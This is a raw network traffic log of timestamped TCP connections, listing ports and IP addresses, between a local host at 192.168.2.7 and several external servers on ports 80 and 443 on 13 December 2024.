Dec 13, 2024 18:53:56.439404011 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.440176964 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.440247059 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.440438986 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.440486908 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.441416979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.441466093 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.441890001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.441951990 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.442241907 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.442290068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.443151951 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.443393946 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.444166899 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.444184065 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.444199085 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.444219112 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.444241047 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.444300890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.444353104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.446212053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.446227074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.446253061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.446259975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.446269035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.446284056 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.446302891 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.446314096 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.447361946 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.447379112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.447422981 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.447433949 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.448390007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.448406935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.448441029 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.448451996 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.449450970 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.449498892 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.449640036 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.449692011 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.450541019 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.450557947 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.450592041 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.451376915 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.451409101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.451430082 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.451630116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.452402115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.452419043 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.452451944 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.452490091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.453720093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.453736067 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.453830957 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.453830957 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.455327034 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.455343008 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.455357075 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.455379009 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.455404997 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.456389904 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.456404924 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.456420898 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.456443071 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.456463099 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.458385944 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.458400965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.458416939 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.458451986 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.458462000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.459353924 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.459439039 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.459500074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.459917068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.461359978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.461374998 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.461391926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.461424112 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.461436987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.606755972 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:56.606816053 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:56.850843906 CET	443	49928	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:56.850924015 CET	49928	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:56.850945950 CET	443	49928	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:56.851039886 CET	443	49928	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:56.851095915 CET	49928	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:56.851126909 CET	49928	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:56.851145029 CET	443	49928	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:56.895279884 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:56.895313978 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:56.898118973 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:56.898144960 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:56.898149967 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:57.476614952 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:57.476716042 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:57.504126072 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:57.624174118 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:57.977818966 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:57.977921009 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.310307026 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:58.310631037 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:58.425055981 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.464919090 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:58.464941025 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:58.469877005 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:58.469877005 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:58.469877005 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:58.469883919 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:58.469899893 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:58.469907045 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:58.545789003 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.571393013 CET	49937	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:58.571436882 CET	443	49937	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:58.571508884 CET	49937	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:58.572671890 CET	49937	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:58.572688103 CET	443	49937	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:58.991292953 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.991370916 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.991410971 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.991430998 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.991477013 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.991477013 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.991789103 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.991805077 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.991822004 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.991838932 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.991954088 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.991955042 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.991955042 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.991955042 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.992505074 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.992556095 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.999670029 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.999686956 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:58.999727964 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:58.999763966 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.007126093 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.007179976 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.011499882 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.011555910 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.097990036 CET	49915	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:59.098105907 CET	49942	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:59.111704111 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.111776114 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.186075926 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.186088085 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.186268091 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.186269045 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.189930916 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.189941883 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.189997911 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.198012114 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.198097944 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.198142052 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.198194027 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.207014084 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.207025051 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.207082987 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.207082987 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.215073109 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.215133905 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.215184927 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.215236902 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.220053911 CET	80	49942	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:59.220135927 CET	49942	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:59.220374107 CET	49942	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:59.220401049 CET	80	49915	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:59.220477104 CET	49915	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:59.222757101 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.222856998 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.222915888 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.231059074 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.231125116 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.231234074 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.231312037 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.239224911 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.239270926 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.239360094 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.239408970 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.247591019 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.247654915 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.247680902 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.247724056 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.255851984 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.255897045 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.255930901 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.255970001 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.262959957 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.263025999 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.263079882 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.263127089 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.270206928 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.270277977 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.270312071 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.270374060 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.340364933 CET	80	49942	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:59.395176888 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.395189047 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.395246983 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.395246983 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.397516966 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.397526979 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.397584915 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.401019096 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.401429892 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.401488066 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.406425953 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.406438112 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.406491995 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.411360025 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.411370993 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.411433935 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.415144920 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.415169001 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.415232897 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.420074940 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.420103073 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.420160055 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.424524069 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.424592018 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.424648046 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.424700975 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.429111958 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.429130077 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.429171085 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.429203987 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.434467077 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.434483051 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.434533119 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.434565067 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.437994003 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.438066959 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.438085079 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.438136101 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.442647934 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.442728996 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.442744970 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.442800045 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.447221994 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.447325945 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.447386980 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.451884985 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.451947927 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.452112913 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.455954075 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.456521034 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.456603050 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.456623077 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.456686974 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.461117029 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.461185932 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.461230993 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.461419106 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.465701103 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.465771914 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.465820074 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.466151953 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.470401049 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.470463991 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.470494986 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.470575094 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.475271940 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.475413084 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.475481987 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.475514889 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.479592085 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.479648113 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.479682922 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.479734898 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.484210968 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.484311104 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.484364986 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.488806963 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.488925934 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:53:59.488984108 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.528642893 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:53:59.558881044 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:59.558953047 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:59.558960915 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:59.559000969 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:59.559057951 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:59.559108973 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:59.559674978 CET	49935	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:59.559684992 CET	443	49935	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:59.649868011 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:54:00.026335955 CET	443	49937	116.203.10.31	192.168.2.7
Dec 13, 2024 18:54:00.029927015 CET	49937	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:54:00.031722069 CET	49937	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:54:00.031732082 CET	443	49937	116.203.10.31	192.168.2.7
Dec 13, 2024 18:54:00.117392063 CET	49937	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:54:00.117402077 CET	443	49937	116.203.10.31	192.168.2.7
Dec 13, 2024 18:54:00.267036915 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:54:00.267213106 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:54:00.591566086 CET	80	49942	185.215.113.43	192.168.2.7
Dec 13, 2024 18:54:00.591636896 CET	49942	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:54:00.597609997 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:00.717402935 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:00.717497110 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:00.737103939 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:00.857079983 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:01.102809906 CET	443	49937	116.203.10.31	192.168.2.7
Dec 13, 2024 18:54:01.102890015 CET	443	49937	116.203.10.31	192.168.2.7
Dec 13, 2024 18:54:01.102904081 CET	49937	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:54:01.102933884 CET	49937	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:54:01.280879974 CET	49937	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:54:01.280914068 CET	443	49937	116.203.10.31	192.168.2.7
Dec 13, 2024 18:54:02.056529045 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.056615114 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.056639910 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.056660891 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.056660891 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.056736946 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.056916952 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.056934118 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.056948900 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.056962967 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.056998014 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.056998014 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.057379961 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.057395935 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.057410002 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.057426929 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.057460070 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.057460070 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.057737112 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.057782888 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.176546097 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.176614046 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.176676989 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.248461008 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.248522997 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.248733997 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.248785973 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.252688885 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.252768040 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.252784014 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.252830982 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.261049032 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.261111021 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.261122942 CET	80	49944	185.215.113.16	192.168.2.7
